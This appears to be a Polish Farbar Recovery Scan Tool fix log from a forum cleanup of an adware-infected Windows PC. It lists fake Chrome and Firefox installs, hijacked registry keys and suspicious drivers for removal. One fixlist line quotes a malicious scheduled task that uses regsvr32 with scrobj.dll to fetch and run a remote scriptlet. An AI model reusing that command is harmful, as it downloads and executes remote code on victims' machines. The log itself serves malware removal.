Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 28-05-2017
Uruchomiony przez Lareco (31-05-2017 14:25:19) Run:1
Uruchomiony z C:\Instalki
Załadowane profile: Lareco (Dostępne profile: Lareco)
Tryb startu: Normal
==============================================

fixlist - zawartość:
*****************
CloseProcesses:
CreateRestorePoint:
Task: {59BEB99E-C271-4376-BDB0-276EA360A713} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj83FURWRjqcMUEcRYI1NYM3FjzLMjH2FdZYRYIxRWqdRH== scrobj.dll
C:\Users\Lareco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Lareco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
RemoveDirectory: C:\Program Files (x86)\Setleaf
RemoveDirectory: C:\Users\Lareco\AppData\Local\Setleaf
RemoveDirectory: C:\Users\Lareco\AppData\Roaming\Setleaf
FirewallRules: [{E75FFA4B-FC78-4CA5-BE2B-43940E08283B}] => (Allow) C:\Program Files (x86)\Setleaf\Application\chrome.exe
FirewallRules: [{AE24E800-7B9F-4513-868E-B8212938ABEB}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{563DD3A2-248E-4668-9278-5F1B363839D7}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Lareco\AppData\Local\Firefox
RemoveDirectory: C:\Users\Lareco\AppData\Roaming\Firefox
Winlogon\Notify\ScCertProp: wlnotify.dll [X]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA
HKU\S-1-5-21-3868839101-544848183-1789199905-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope - brak warto�ci
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [Brak podpisu cyfrowego] <==== UWAGA
S2 InstallerService; "C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe" [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U3 pxldqpow; \??\C:\Users\Lareco\AppData\Local\Temp\pxldqpow.sys [X] <==== UWAGA
2017-05-24 12:10 - 2017-05-24 12:10 - 00000000 _____ C:\Windows\SysWOW64\55
2017-05-24 12:09 - 2017-05-24 12:09 - 00000042 _____ C:\Windows\SysWOW64\GZ
2017-05-11 15:10 - 2017-05-18 09:09 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-11 15:09 - 2017-05-24 12:10 - 00000000 _____ C:\Windows\SysWOW64\33
2017-05-11 15:09 - 2017-05-24 12:09 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-11 15:09 - 2017-05-24 12:09 - 00000000 _____ C:\Windows\SysWOW64\11
2017-05-11 15:09 - 2017-05-24 12:09 - 00000000 _____ C:\Windows\SysWOW64\00
2017-05-11 15:09 - 2017-05-18 09:09 - 00000000 _____ C:\Windows\SysWOW64\1111111
C:\Program Files (x86)\BiaoJi
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
DeleteKey: HKCU\Software\Mozilla\Firefox
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla\Firefox
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Lareco\AppData\Local\Mozilla\Firefox
C:\Users\Lareco\AppData\Roaming\Mozilla\Firefox
C:\Users\Lareco\AppData\Roaming\Profiles
EmptyTemp:
*****************

Procesy zostały pomyślnie zamknięte.